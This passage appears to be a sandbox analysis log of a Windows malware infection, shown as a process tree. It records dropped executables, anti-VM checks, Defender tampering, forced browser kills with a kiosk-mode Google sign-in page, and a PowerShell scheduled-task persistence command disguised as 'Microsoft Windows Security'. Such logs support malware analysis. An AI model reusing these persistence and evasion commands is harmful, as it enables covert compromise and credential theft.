                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6689758,0x7fef6689768,0x7fef6689778
                                    9⤵
                                      PID:1064
                                    • C:\Windows\system32\ctfmon.exe
                                      ctfmon.exe
                                      9⤵
                                        PID:1928
                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1112 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:2
                                        9⤵
                                          PID:1756
                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1504 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:8
                                          9⤵
                                            PID:1880
                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1596 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:8
                                            9⤵
                                              PID:1184
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2052 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:1
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:2948
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=2076 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:1
                                              9⤵
                                              • Uses browser remote debugging
                                              PID:1060
                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=angle --use-angle=swiftshader-webgl --mojo-platform-channel-handle=1456 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:2
                                              9⤵
                                                PID:3252
                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --remote-debugging-port=9223 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=3288 --field-trial-handle=1300,i,12963622249012461675,9082749994917828929,131072 /prefetch:1
                                                9⤵
                                                • Uses browser remote debugging
                                                PID:3364
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1009342001\VBVEd6f.exe" & rd /s /q "C:\ProgramData\JEBFIIIEHCFH" & exit
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              PID:3164
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /t 10
                                                9⤵
                                                • System Location Discovery: System Language Discovery
                                                • Delays execution with timeout.exe
                                                PID:344
                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy remotesigned -File "C:\Users\Admin\AppData\Local\Temp\1009351041\PeRVAzl.ps1"
                                            7⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • System Location Discovery: System Language Discovery
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:1492
                                          • C:\Users\Admin\AppData\Local\Temp\1009360001\17b5adcd83.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1009360001\17b5adcd83.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:1048
                                          • C:\Users\Admin\AppData\Local\Temp\1009361001\a077d9ad88.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1009361001\a077d9ad88.exe"
                                            7⤵
                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                            • Checks BIOS information in registry
                                            • Executes dropped EXE
                                            • Identifies Wine through registry keys
                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                            • System Location Discovery: System Language Discovery
                                            PID:3496
                                          • C:\Users\Admin\AppData\Local\Temp\1009362001\fdf86a2bc0.exe
                                            "C:\Users\Admin\AppData\Local\Temp\1009362001\fdf86a2bc0.exe"
                                            7⤵
                                            • Executes dropped EXE
                                            PID:3812
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM firefox.exe /T
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3828
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM chrome.exe /T
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3224
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM msedge.exe /T
                                              8⤵
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:1560
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM opera.exe /T
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:2764
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /F /IM brave.exe /T
                                              8⤵
                                              • System Location Discovery: System Language Discovery
                                              • Kills process with taskkill
                                              • Suspicious use of AdjustPrivilegeToken
                                              PID:3176
                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                              "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
                                              8⤵
                                                PID:3944
                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
                                                  9⤵
                                                  • Checks processor information in registry
                                                  • Modifies registry class
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:3572
                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.0.2108510249\590262049" -parentBuildID 20221007134813 -prefsHandle 1240 -prefMapHandle 1164 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e18e0919-0b06-482f-8693-fc3dc9632d7b} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1316 112d7558 gpu
                                                    10⤵
                                                      PID:4068
                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.1.303882532\1085548684" -parentBuildID 20221007134813 -prefsHandle 1512 -prefMapHandle 1508 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5b76021f-4268-4edb-b7d4-8dbe95419877} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1524 f1faa58 socket
                                                      10⤵
                                                        PID:2568
                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.2.1187441485\1262172096" -childID 1 -isForBrowser -prefsHandle 2464 -prefMapHandle 2460 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {e3e46967-3216-494d-a9e9-79f7236a5362} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2476 11260058 tab
                                                        10⤵
                                                          PID:3216
                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.3.117679410\1370028322" -childID 2 -isForBrowser -prefsHandle 2928 -prefMapHandle 2924 -prefsLen 26216 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {128e9118-beed-402e-a8fa-d673de43a396} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2940 1c115758 tab
                                                          10⤵
                                                            PID:3340
                                                          • C:\Program Files\Mozilla Firefox\firefox.exe
                                                            "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.4.1437272989\434179208" -childID 3 -isForBrowser -prefsHandle 3532 -prefMapHandle 3256 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a0af75d6-de5a-4ba0-9495-37280431c200} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 1188 1b080958 tab
                                                            10⤵
                                                              PID:3384
                                                            • C:\Program Files\Mozilla Firefox\firefox.exe
                                                              "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.5.475500992\1052355102" -childID 4 -isForBrowser -prefsHandle 3828 -prefMapHandle 3720 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0682d68e-e6dd-4002-8540-a0282ff64824} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 3816 1b07f458 tab
                                                              10⤵
                                                                PID:3716
                                                              • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.6.2006154946\844683251" -childID 5 -isForBrowser -prefsHandle 3996 -prefMapHandle 4000 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b9de6d57-e20e-402c-a5e9-8ffc1ede1bea} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 3984 1b081e58 tab
                                                                10⤵
                                                                  PID:3424
                                                                • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                  "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.7.37491117\1833654595" -childID 6 -isForBrowser -prefsHandle 2552 -prefMapHandle 2556 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5af5b30d-3896-445a-a3a9-393166a91d34} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2532 1d6c3b58 tab
                                                                  10⤵
                                                                    PID:1100
                                                                  • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.8.1931474314\1213694255" -childID 7 -isForBrowser -prefsHandle 1112 -prefMapHandle 2584 -prefsLen 26531 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {be35ea03-9fce-4d7f-a3fd-5a409b4a5b8d} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 2364 184cb558 tab
                                                                    10⤵
                                                                      PID:3652
                                                                    • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                      "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.9.49933002\1994294668" -parentBuildID 20221007134813 -prefsHandle 4508 -prefMapHandle 4504 -prefsLen 26796 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9d97130c-d27f-434f-9df6-8a2f3e4f3f00} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 4520 227a1e58 rdd
                                                                      10⤵
                                                                        PID:2612
                                                                      • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.10.82216082\637417715" -childID 8 -isForBrowser -prefsHandle 4620 -prefMapHandle 4616 -prefsLen 26796 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {2e70e01f-4698-46fe-843b-36341a60dde0} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 4632 227a4558 tab
                                                                        10⤵
                                                                          PID:3376
                                                                        • C:\Program Files\Mozilla Firefox\firefox.exe
                                                                          "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="3572.11.602118539\106706448" -parentBuildID 20221007134813 -sandboxingKind 1 -prefsHandle 8764 -prefMapHandle 4740 -prefsLen 26796 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {66efaeb0-bbb3-4307-afb8-84fef1546c0c} 3572 "\\.\pipe\gecko-crash-server-pipe.3572" 8752 23154e58 utility
                                                                          10⤵
                                                                            PID:3628
                                                                    • C:\Users\Admin\AppData\Local\Temp\1009363001\32b1c3a712.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\1009363001\32b1c3a712.exe"
                                                                      7⤵
                                                                      • Modifies Windows Defender Real-time Protection settings
                                                                      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                      • Checks BIOS information in registry
                                                                      • Executes dropped EXE
                                                                      • Identifies Wine through registry keys
                                                                      • Windows security modification
                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                      • System Location Discovery: System Language Discovery
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:3956
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\maza-0.16.3-win64-setup-unsigned.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • Drops file in Program Files directory
                                                              • System Location Discovery: System Language Discovery
                                                              • Modifies registry class
                                                              PID:1516
                                                              • C:\Program Files\Maza\maza-qt.exe
                                                                "C:\Program Files\Maza\maza-qt.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                • Suspicious behavior: AddClipboardFormatListener
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                • Suspicious use of SetWindowsHookEx
                                                                PID:2328
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\pp.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\pp.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Loads dropped DLL
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1280
                                                              • C:\Users\Admin\AppData\Local\Temp\2892715595.exe
                                                                C:\Users\Admin\AppData\Local\Temp\2892715595.exe
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:1616
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\soft.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\soft.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:2872
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\hashed.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              • Checks processor information in registry
                                                              PID:2768
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\GoogleUpdate.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1884
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                4⤵
                                                                • Loads dropped DLL
                                                                • System Location Discovery: System Language Discovery
                                                                PID:1404
                                                                • C:\Program Files\Google\Chrome\Application\HKZINHMZHBGY0.exe
                                                                  "C:\Program Files\Google\Chrome\Application\HKZINHMZHBGY0.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2764
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\Set_up.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3092
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\morphic.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of AdjustPrivilegeToken
                                                              PID:3568
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\legas.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\legas.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • Suspicious use of SetThreadContext
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4232
                                                              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                                                                4⤵
                                                                • System Location Discovery: System Language Discovery
                                                                PID:4256
                                                                • C:\Users\Admin\AppData\Roaming\CCU5HWRV8s.exe
                                                                  "C:\Users\Admin\AppData\Roaming\CCU5HWRV8s.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:4380
                                                                • C:\Users\Admin\AppData\Roaming\oPK9X0q98z.exe
                                                                  "C:\Users\Admin\AppData\Roaming\oPK9X0q98z.exe"
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  PID:4408
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 4232 -s 52
                                                                4⤵
                                                                • Program crash
                                                                PID:4320
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\key.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\key.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:2240
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2240 -s 128
                                                                4⤵
                                                                • Program crash
                                                                PID:4472
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\AsyncClient.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4644
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\zx.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:4668
                                                              • C:\Users\Admin\AppData\Local\Temp\Files\zx.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Files\zx.exe"
                                                                4⤵
                                                                • Executes dropped EXE
                                                                PID:3368
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\NVIDIA.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:3604
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\cudo.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:3580
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\S%D0%B5tup.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:3372
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\nguyentri38.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\nguyentri38.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:4512
                                                              • C:\Windows\system32\cmd.exe
                                                                "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\BC2E.tmp\BC2F.tmp\BC30.bat C:\Users\Admin\AppData\Local\Temp\Files\nguyentri38.exe"
                                                                4⤵
                                                                • Drops startup file
                                                                PID:4552
                                                                • C:\Users\Admin\AppData\Roaming\Bypass.exe
                                                                  Bypass.exe
                                                                  5⤵
                                                                  • Executes dropped EXE
                                                                  • System Location Discovery: System Language Discovery
                                                                  • Suspicious behavior: CmdExeWriteProcessMemorySpam
                                                                  PID:4580
                                                                  • C:\Users\Admin\AppData\Local\Temp\Defender.exe
                                                                    "C:\Users\Admin\AppData\Local\Temp\Defender.exe" /D
                                                                    6⤵
                                                                    • Modifies security service
                                                                    • Executes dropped EXE
                                                                    • Windows security modification
                                                                    • Drops file in System32 directory
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:1920
                                                                    • C:\Users\Admin\AppData\Local\Temp\Defender.exe
                                                                      "C:\Users\Admin\AppData\Local\Temp\Defender.exe" /SYS 1
                                                                      7⤵
                                                                      • Modifies security service
                                                                      • Executes dropped EXE
                                                                      • Windows security modification
                                                                      • System Location Discovery: System Language Discovery
                                                                      PID:4456
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\newtpp.exe"
                                                              3⤵
                                                              • Executes dropped EXE
                                                              PID:316
                                                            • C:\Users\Admin\AppData\Local\Temp\Files\DIFF.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\Files\DIFF.exe"
                                                              3⤵
                                                              • Adds Run key to start application
                                                              PID:5056
                                                              • C:\Windows\system32\WerFault.exe
                                                                C:\Windows\system32\WerFault.exe -u -p 5056 -s 616
                                                                4⤵
                                                                  PID:2868
                                                              • C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\Files\bildnewl.exe"
                                                                3⤵
                                                                • Adds Run key to start application
                                                                PID:4100
                                                                • C:\Windows\system32\WerFault.exe
                                                                  C:\Windows\system32\WerFault.exe -u -p 4100 -s 1140
                                                                  4⤵
                                                                    PID:4288
                                                              • C:\Windows\system32\taskmgr.exe
                                                                "C:\Windows\system32\taskmgr.exe" /4
                                                                2⤵
                                                                • Loads dropped DLL
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious behavior: GetForegroundWindowSpam
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                • Suspicious use of FindShellTrayWindow
                                                                • Suspicious use of SendNotifyMessage
                                                                PID:2644
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                2⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2904
                                                                • C:\Windows\system32\schtasks.exe
                                                                  "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                  3⤵
                                                                  • Scheduled Task/Job: Scheduled Task
                                                                  PID:1596
                                                              • C:\Windows\System32\schtasks.exe
                                                                C:\Windows\System32\schtasks.exe /run /tn "Microsoft Windows Security"
                                                                2⤵
                                                                  PID:2860
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                                                  2⤵
                                                                  • Command and Scripting Interpreter: PowerShell
                                                                  • Drops file in System32 directory
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:1892
                                                                  • C:\Windows\system32\schtasks.exe
                                                                    "C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /tn "Microsoft Windows Security" /tr "'C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe'"
                                                                    3⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2336
                                                                • C:\Windows\System32\conhost.exe
                                                                  C:\Windows\System32\conhost.exe
                                                                  2⤵
                                                                    PID:1488
                                                                  • C:\Windows\System32\dwm.exe
                                                                    C:\Windows\System32\dwm.exe
                                                                    2⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    • Suspicious use of FindShellTrayWindow
                                                                    • Suspicious use of SendNotifyMessage
                                                                    PID:1140
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe"
                                                                    2⤵
                                                                    • Enumerates system info in registry
                                                                    PID:3680
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xc0,0xc4,0xc8,0x94,0xcc,0x7fef6689758,0x7fef6689768,0x7fef6689778
                                                                      3⤵
                                                                        PID:3704
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1156 --field-trial-handle=1292,i,3344130887659847087,14808202254722821800,131072 /prefetch:2
                                                                        3⤵
                                                                          PID:3532
